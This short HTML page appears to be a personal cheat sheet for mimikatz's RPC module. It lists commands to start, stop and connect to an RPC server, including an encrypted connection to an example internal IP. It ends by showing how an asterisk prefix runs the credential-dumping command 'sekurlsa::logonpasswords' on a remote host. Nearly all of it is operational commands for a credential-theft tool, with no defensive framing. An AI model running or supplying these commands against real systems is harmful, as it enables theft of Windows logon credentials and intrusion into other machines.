<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>New Page</title>
</head><body><b><u>Start an RPC Server:</u></b><br/>
<br/>
rpc::server<br/>
<br/>
<b><u>Connect to RPC server:</u></b><br/>
<br/>
rpc::connect<br/>
<br/>
<b><u>Stop RPC Connection:</u></b><br/>
<br/>
rpc::server /stop<br/>
<br/>
<b><u>Enumerate all the RPC things:</u></b><br/>
<br/>
rpc::enum<br/>
<br/>
<b><u>Securely Connect to RPC Server:<br/>
<br/>
</u></b>rpc::connect /server:192.168.1.66 /alg:RC4<br/>
<br/>
<b><u>Interact with remote RPC Server:</u></b><br/>
<br/>
***Always prepend commands with an asterisk to interact remotely<br/>
<br/>
local mimikatz command - sekurlsa::logonpasswords<br/>
remote mimikatz command - *sekurlsa::logonpasswords<br/>
<br/>
</body></html>